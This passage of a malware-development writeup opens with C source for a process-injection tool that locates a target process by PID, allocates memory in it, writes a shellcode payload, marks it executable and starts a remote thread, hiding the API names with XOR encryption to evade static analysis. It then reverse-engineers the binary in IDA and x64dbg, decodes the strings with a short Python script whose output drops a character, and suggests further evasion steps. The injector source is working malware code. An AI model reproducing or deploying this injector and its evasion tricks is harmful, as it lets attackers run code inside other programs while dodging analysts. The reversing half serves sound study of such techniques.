// ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
//
unsigned char kernel32_dll_encrypted[] = { 0x3c, 0x32, 0x25, 0x39, 0x32, 0x3b, 0x64, 0x65, 0x79, 0x33, 0x3b, 0x3b, 0x57 };
xor_decrypt( kernel32_dll_encrypted, sizeof(kernel32_dll_encrypted) );
HMODULE kernel32_dll_handle = LoadLibraryA( kernel32_dll_encrypted );
if( NULL == kernel32_dll_handle )
{
// printf( "Could not load kernel32.dll!\n" );
return 1;
}
unsigned char CreateToolhelp32Snapshot_encrypted[] = { 0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x03, 0x38, 0x38, 0x3b, 0x3f, 0x32, 0x3b, 0x27, 0x64, 0x65, 0x04, 0x39, 0x36, 0x27, 0x24, 0x3f, 0x38, 0x23, 0x57 };
xor_decrypt( CreateToolhelp32Snapshot_encrypted, sizeof(CreateToolhelp32Snapshot_encrypted) );
HANDLE( WINAPI * _CreateToolhelp32Snapshot )
(
DWORD dwFlags,
DWORD th32ProcessID
);
_CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
(
DWORD dwFlags,
DWORD th32ProcessID
)) GetProcAddress( kernel32_dll_handle, CreateToolhelp32Snapshot_encrypted );
if( NULL == _CreateToolhelp32Snapshot )
{
// printf( "Could not resolve CreateToolhelp32Snapshot!\n" );
return 1;
}
process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( NULL == process_snapshot )
{
return 1;
}
current_process.dwSize = sizeof( PROCESSENTRY32 );
unsigned char Process32First_encrypted[] = { 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x64, 0x65, 0x11, 0x3e, 0x25, 0x24, 0x23, 0x57 };
xor_decrypt( Process32First_encrypted, sizeof(Process32First_encrypted) );
BOOL( WINAPI * _Process32First)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
_Process32First = ( BOOL (WINAPI *)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
)) GetProcAddress( kernel32_dll_handle, Process32First_encrypted );
if( NULL == _Process32First )
{
// printf( "Could not resolve Process32First!\n" );
return 1;
}
_Process32First( process_snapshot, ¤t_process );
BOOL( WINAPI * _Process32Next)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
unsigned char Process32Next_encrypted[] = { 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x64, 0x65, 0x19, 0x32, 0x2f, 0x23, 0x57 };
xor_decrypt( Process32Next_encrypted, sizeof(Process32Next_encrypted) );
_Process32Next = ( BOOL (WINAPI *)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
)) GetProcAddress( kernel32_dll_handle, Process32Next_encrypted );
if( NULL == _Process32Next )
{
// printf( "Could not resolve Process32Next!\n" );
return 1;
}
do
{
// printf( "process id = %d\n", current_process.th32ProcessID );
if( process_id == current_process.th32ProcessID )
{
unsigned char OpenProcess_encrypted[] = { 0x18, 0x27, 0x32, 0x39, 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x57 };
xor_decrypt( OpenProcess_encrypted, sizeof(OpenProcess_encrypted) );
HANDLE( WINAPI * _OpenProcess )
(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
);
_OpenProcess = ( HANDLE (WINAPI *)
(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
)) GetProcAddress( kernel32_dll_handle, OpenProcess_encrypted );
if( NULL == _OpenProcess )
{
// printf( "Could not resolve OpenProcess!\n" );
return 1;
}
target_process = _OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
break;
}
}
while( _Process32Next(process_snapshot, ¤t_process) );
CloseHandle( process_snapshot );
if( NULL == target_process )
{
return 1;
}
//
// ALLOCATE MEMORY IN TARGET PROCESS
//
size_t payload_size = sizeof( payload );
LPVOID target_process_allocated_memory = NULL;
unsigned char VirtualAllocEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16, 0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57 };
xor_decrypt( VirtualAllocEx_encrypted, sizeof(VirtualAllocEx_encrypted) );
LPVOID( WINAPI * _VirtualAllocEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
_VirtualAllocEx = ( LPVOID( WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
)) GetProcAddress( kernel32_dll_handle, VirtualAllocEx_encrypted );
if( NULL == _VirtualAllocEx )
{
// printf( "Could not resolve VirtualAllocEx!\n" );
return 1;
}
target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
if( NULL == target_process_allocated_memory )
{
// printf( "[!] Could not allocate memory!\n" );
return 1;
}
// printf( "[+] Successfully allocated memory!\n" );
//
// WRITE TO ALLOCATED MEMORY
//
BOOL return_check = FALSE;
unsigned char WriteProcessMemory_encrypted[] = { 0x00, 0x25, 0x3e, 0x23, 0x32, 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x1a, 0x32, 0x3a, 0x38, 0x25, 0x2e, 0x57 };
xor_decrypt( WriteProcessMemory_encrypted, sizeof(WriteProcessMemory_encrypted) );
BOOL( WINAPI * _WriteProcessMemory )
(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
);
_WriteProcessMemory = ( BOOL(WINAPI *)
(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
)) GetProcAddress( kernel32_dll_handle, WriteProcessMemory_encrypted );
if( NULL == _WriteProcessMemory )
{
// printf( "Could not resolve WriteProcessMemory!\n" );
return 1;
}
return_check = _WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );
if( FALSE == return_check )
{
// printf( "[+] WriteProcessMemory returned false!\n" );
return 1;
}
//
// UPDATE PERMISSIONS TO ALLOW EXECUTION
//
DWORD old_protect = NULL;
unsigned char VirtualProtectEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x07, 0x25, 0x38, 0x23, 0x32, 0x34, 0x23, 0x12, 0x2f, 0x57 };
xor_decrypt( VirtualProtectEx_encrypted, sizeof(VirtualProtectEx_encrypted) );
BOOL( WINAPI * _VirtualProtectEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
_VirtualProtectEx = ( BOOL(WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
)) GetProcAddress( kernel32_dll_handle, VirtualProtectEx_encrypted );
if( NULL == _VirtualProtectEx )
{
// printf( "Could not resolve VirtualProtectEx!\n" );
return 0;
}
return_check = _VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );
if( FALSE == return_check )
{
// printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
return 1;
}
//
// EXECUTED SHELLCODE IN ALLOCATED MEMORY
//
HANDLE handle_remote_thread = NULL;
unsigned char CreateRemoteThread_encrypted[] = { 0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x05, 0x32, 0x3a, 0x38, 0x23, 0x32, 0x03, 0x3f, 0x25, 0x32, 0x36, 0x33, 0x57 };
xor_decrypt( CreateRemoteThread_encrypted, sizeof(CreateRemoteThread_encrypted) );
HANDLE( WINAPI * _CreateRemoteThread )
(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
_CreateRemoteThread = ( HANDLE(WINAPI *)
(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
)) GetProcAddress( kernel32_dll_handle, CreateRemoteThread_encrypted );
if( NULL == _CreateRemoteThread )
{
// printf( "Could not resolve CreateRemoteThread!\n" );
return 1;
}
handle_remote_thread = _CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );
if( NULL == handle_remote_thread )
{
// printf( "[!] CreateRemoteThread() failed!\n" );
return 1;
}
return 0;
}
Static Analysis of encrypted-apis.exe
To start off, looking at the IAT and the strings table within IDA doesn’t really give us any solid indication of what’s going on with the program. Two interesting APIs that are in the IAT that show up are LoadLibraryA
and GetProcAddress
, however from the strings table we cannot see how these are being used right away. Shown below is the pseudocode that IDA generated.
int __fastcall main(int argc, const char **argv, const char **envp)
{
HMODULE hModule; // [rsp+48h] [rbp-270h]
__int64 v5; // [rsp+50h] [rbp-268h]
__int64 v6; // [rsp+58h] [rbp-260h]
HANDLE hObject; // [rsp+60h] [rbp-258h]
int v8; // [rsp+68h] [rbp-250h]
int v9; // [rsp+6Ch] [rbp-24Ch] BYREF
__int64 v10; // [rsp+70h] [rbp-248h]
FARPROC ProcAddress; // [rsp+78h] [rbp-240h]
FARPROC v12; // [rsp+80h] [rbp-238h]
FARPROC v13; // [rsp+88h] [rbp-230h]
FARPROC v14; // [rsp+90h] [rbp-228h]
FARPROC v15; // [rsp+98h] [rbp-220h]
FARPROC v16; // [rsp+A0h] [rbp-218h]
FARPROC v17; // [rsp+A8h] [rbp-210h]
FARPROC v18; // [rsp+B0h] [rbp-208h]
__int64 v19; // [rsp+B8h] [rbp-200h]
int v20; // [rsp+C0h] [rbp-1F8h] BYREF
unsigned int v21; // [rsp+C8h] [rbp-1F0h]
CHAR v22; // [rsp+1F0h] [rbp-C8h] BYREF
char v23[11]; // [rsp+1F1h] [rbp-C7h] BYREF
CHAR LibFileName[16]; // [rsp+200h] [rbp-B8h] BYREF
CHAR v25[10]; // [rsp+210h] [rbp-A8h] BYREF
char v26[4]; // [rsp+21Ah] [rbp-9Eh] BYREF
CHAR v27[10]; // [rsp+220h] [rbp-98h] BYREF
char v28[5]; // [rsp+22Ah] [rbp-8Eh] BYREF
CHAR v29[13]; // [rsp+230h] [rbp-88h] BYREF
char v30[2]; // [rsp+23Dh] [rbp-7Bh] BYREF
CHAR v31[15]; // [rsp+240h] [rbp-78h] BYREF
char v32[2]; // [rsp+24Fh] [rbp-69h] BYREF
CHAR v33[13]; // [rsp+258h] [rbp-60h] BYREF
char v34[6]; // [rsp+265h] [rbp-53h] BYREF
CHAR v35[13]; // [rsp+270h] [rbp-48h] BYREF
char v36[6]; // [rsp+27Dh] [rbp-3Bh] BYREF
CHAR ProcName[17]; // [rsp+288h] [rbp-30h] BYREF
char v38[8]; // [rsp+299h] [rbp-1Fh] BYREF
if ( argc < 2 )
return 1;
v5 = 0LL;
v8 = unknown_libname_19(argv[1], argv, envp);
qmemcpy(LibFileName, "<2%92;dey3;;W", 13);
sub_140001000((__int64)LibFileName, 0xDu);
hModule = LoadLibraryA(LibFileName);
if ( !hModule )
return 1;
ProcName[0] = 20;
ProcName[1] = 37;
ProcName[2] = 50;
ProcName[3] = 54;
ProcName[4] = 35;
ProcName[5] = 50;
ProcName[6] = 3;
ProcName[7] = 56;
ProcName[8] = 56;
ProcName[9] = 59;
ProcName[10] = 63;
ProcName[11] = 50;
ProcName[12] = 59;
ProcName[13] = 39;
ProcName[14] = 100;
ProcName[15] = 101;
ProcName[16] = 4;
qmemcpy(v38, "96'$?8#W", sizeof(v38));
sub_140001000((__int64)ProcName, 0x19u);
ProcAddress = GetProcAddress(hModule, ProcName);
if ( !ProcAddress )
return 1;
hObject = (HANDLE)((__int64 (__fastcall *)(__int64, _QWORD))ProcAddress)(2LL, 0LL);
if ( !hObject )
return 1;
v20 = 304;
v27[0] = 7;
v27[1] = 37;
v27[2] = 56;
v27[3] = 52;
v27[4] = 50;
v27[5] = 36;
v27[6] = 36;
v27[7] = 100;
v27[8] = 101;
v27[9] = 17;
qmemcpy(v28, ">%$#W", sizeof(v28));
sub_140001000((__int64)v27, 15u);
v12 = GetProcAddress(hModule, v27);
if ( !v12 )
return 1;
((void (__fastcall *)(HANDLE, int *))v12)(hObject, &v20);
v25[0] = 7;
v25[1] = 37;
v25[2] = 56;
v25[3] = 52;
v25[4] = 50;
v25[5] = 36;
v25[6] = 36;
v25[7] = 100;
v25[8] = 101;
v25[9] = 25;
qmemcpy(v26, "2/#W", sizeof(v26));
sub_140001000((__int64)v25, 0xEu);
v14 = GetProcAddress(hModule, v25);
if ( !v14 )
return 1;
while ( v8 != v21 )
{
if ( !((unsigned int (__fastcall *)(HANDLE, int *))v14)(hObject, &v20) )
goto LABEL_18;
}
v22 = 24;
qmemcpy(v23, "'29\a%842$$W", sizeof(v23));
sub_140001000((__int64)&v22, 0xCu);
v13 = GetProcAddress(hModule, &v22);
if ( !v13 )
return 1;
v5 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))v13)(0x1FFFFFLL, 1LL, v21);
LABEL_18:
CloseHandle(hObject);
if ( !v5 )
return 1;
v10 = 3072LL;
v29[0] = 1;
v29[1] = 62;
v29[2] = 37;
v29[3] = 35;
v29[4] = 34;
v29[5] = 54;
v29[6] = 59;
v29[7] = 22;
v29[8] = 59;
v29[9] = 59;
v29[10] = 56;
v29[11] = 52;
v29[12] = 18;
qmemcpy(v30, "/W", sizeof(v30));
sub_140001000((__int64)v29, 0xFu);
v15 = GetProcAddress(hModule, v29);
if ( !v15 )
return 1;
v6 = ((__int64 (__fastcall *)(__int64, _QWORD, __int64, __int64, int))v15)(v5, 0LL, v10, 12288LL, 4);
if ( !v6 )
return 1;
v33[0] = 0;
v33[1] = 37;
v33[2] = 62;
v33[3] = 35;
v33[4] = 50;
v33[5] = 7;
v33[6] = 37;
v33[7] = 56;
v33[8] = 52;
v33[9] = 50;
v33[10] = 36;
v33[11] = 36;
v33[12] = 26;
qmemcpy(v34, "2:8%.W", sizeof(v34));
sub_140001000((__int64)v33, 0x13u);
v16 = GetProcAddress(hModule, v33);
if ( !v16 )
return 1;
if ( !((unsigned int (__fastcall *)(__int64, __int64, void *, __int64, _QWORD))v16)(v5, v6, &unk_14001C000, v10, 0LL) )
return 1;
v9 = 0;
v31[0] = 1;
v31[1] = 62;
v31[2] = 37;
v31[3] = 35;
v31[4] = 34;
v31[5] = 54;
v31[6] = 59;
v31[7] = 7;
v31[8] = 37;
v31[9] = 56;
v31[10] = 35;
v31[11] = 50;
v31[12] = 52;
v31[13] = 35;
v31[14] = 18;
qmemcpy(v32, "/W", sizeof(v32));
sub_140001000((__int64)v31, 0x11u);
v17 = GetProcAddress(hModule, v31);
if ( !v17 )
return 0;
if ( !((unsigned int (__fastcall *)(__int64, __int64, __int64, __int64, int *))v17)(v5, v6, v10, 64LL, &v9) )
return 1;
v19 = 0LL;
v35[0] = 20;
v35[1] = 37;
v35[2] = 50;
v35[3] = 54;
v35[4] = 35;
v35[5] = 50;
v35[6] = 5;
v35[7] = 50;
v35[8] = 58;
v35[9] = 56;
v35[10] = 35;
v35[11] = 50;
v35[12] = 3;
qmemcpy(v36, "?%263W", sizeof(v36));
sub_140001000((__int64)v35, 0x13u);
v18 = GetProcAddress(hModule, v35);
if ( !v18 )
return 1;
v19 = ((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))v18)(
v5,
0LL,
0LL,
v6,
0LL,
0,
0LL);
return v19 == 0;
}
In the pseudocode that’s been generated, we can see a general pattern of
- Program defines some sort of string
sub_140001000
is called with the defined string and an integer as the argumentsGetProcAddress
is called with the same argument from whensub_140001000
is called. The address returned is saved onto a variable- The variable from the third step is casted as a function type with some sort of function signature
Looking into what sub_140001000
does:
__int64 __fastcall sub_140001000(__int64 a1, unsigned int a2)
{
__int64 result; // rax
int i; // [rsp+4h] [rbp-14h]
for ( i = 0; ; ++i )
{
result = a2;
if ( i >= (int)a2 )
break;
*(_BYTE *)(a1 + i) ^= 0x57u;
}
return result;
}
So first, instead of the function saying it’s getting a string (the address to the string) passed into it, it says a 64 bit integer. To change the function signature we can Set item type
(change the arguments/function signature) for it to get passed in a char *
- a string. Doing so results in the pseudocode being updated like so:
__int64 __fastcall sub_140001000(char *a1, unsigned int a2)
{
__int64 result; // rax
signed int i; // [rsp+4h] [rbp-14h]
for ( i = 0; ; ++i )
{
result = a2;
if ( i >= (int)a2 )
break;
a1[i] ^= 0x57u;
}
return result;
}
From this, we can see that the for loop increments by one until a2 (which we assume is the length) is reached. Until then, it goes through all the characters of the string and XOR’s it by 0x57
. To attempt to decrypt one of the strings, I used ProcName
from the pseudocode and converted it first to hexadecimal:
ProcName[0] = 0x14;
ProcName[1] = 0x25;
ProcName[2] = 0x32;
ProcName[3] = 0x36;
ProcName[4] = 0x23;
ProcName[5] = 0x32;
ProcName[6] = 3;
ProcName[7] = 0x38;
ProcName[8] = 0x38;
ProcName[9] = 0x3B;
ProcName[10] = 0x3F;
ProcName[11] = 0x32;
ProcName[12] = 0x3B;
ProcName[13] = 0x27;
ProcName[14] = 0x64;
ProcName[15] = 0x65;
ProcName[16] = 4;
qmemcpy(v38, "96'$?8#W", sizeof(v38));
sub_140001000(ProcName, 25u);
ProcAddress = GetProcAddress(hModule, ProcName);
Looking at the decompilation view in IDA, we can see more hex values being allocated into the string:
I wrote a python3 program string-dec.py
to XOR bytes with the key, convert to string, and print the resulting string. Here is the program and the output:
# define byte string
enc_string = b'\x14\x25\x32\x36\x23\x32\x03\x38\x38\x3b\x3f\x32\x3b\x27\x64\x04\x39\x36\x27\x24\x3f\x38\x23\x57'
xor_key = b'\x57'
plaintext = []
for byte in enc_string:
xor_byte = byte ^ xor_key[0]
plaintext.append( xor_byte )
byte_string = bytes( plaintext )
resulting_string = byte_string.decode('utf-8')
print( resulting_string )
> python3 string-dec.py
CreateToolhelp3Snapshot
This shows that the API name that’s been encrypted is the CreateToolhelp32Snapshot
. Following the same procedure shows all the API calls being resolved using GetProcAddress
.
To look into an alternate way via dynamic analysis, I also looked into doing some analysis using x64 debugger. To do this, first load the program into the debugger, ensure you add the argument for the PID (under File
> Change Command Line
, then add the PID after the parenthesis of the program path (i.e. "C:\Malware Dev\api-obfuscation\encrypted-apis.exe" 4188
). Then, I set a breakpoint for every time GetProcAddress
is called. To do this go to the Symbols
tab, click on kernel32.dll
, then look for GetProcAddress
, right click and click Toggle Breakpoint
. Then on the top you can run the program and it’ll stop every time the API is called. After investigating through some of the GetProcAddress
calls, it gets to the point where we see the name of the API being called in the RDX
register. An example is shown below where it shows CreateToolhelp32Snapshot
being loaded:
You can see the instruction pointer RIP
is set right before GetProcAddress
is called with CreateToolhelp32Snapshot
being part of the arguments on the stack. On the top we can click the forward arrow to continue executing and the debugger will continue to stop with each GetProcAddress
call, and we’re able to see the name of the API being resolved in the RDX
register. By doing this, we can see the rest of API names being resolved in plaintext and therefore can conclude what the program is doing.
Conclusion, Further Possibilities and Considerations
This writeup went over the process of developing a simple malware program for shellcode injection and applying various obfuscation techniques to evade static analysis. Through the use of API obfuscation and string encryption, we demonstrated how these techniques can hinder reverse engineering efforts, making it more challenging (but not impossible!) to analyze the program using standard tools like IDA.
For further studies, one could consider that two interesting APIs are still on the IAT - GetProcAddress
and LoadLibraryA
. There are ways to calculate and obtain the absolute address of both these APIs by traversing the PEB which is outlined in my previous shellcoding in C writeup. One could do this to find the address of those two API addresses to resolve them, and then use them to completely hide all the APIs from the IAT. In addition, further obfuscation techniques like malware hashing could be leveraged to make it more difficult for malware analysts to understand what APIs or strings are being used throughout this program. API hashing was previously planned for this writeup but will likely be it’s own writeup due to time constraints.
On the reversing side of things, being more thorough with the dynamic analysis could have been done to see the decryption in memory being taken place instead of relying on setting breakpoints on a specific API (what if it’s resolved and thus is never formally “called”?). Rebasing the addresses with what’s in IDA could’ve also been done to follow program execution flow better.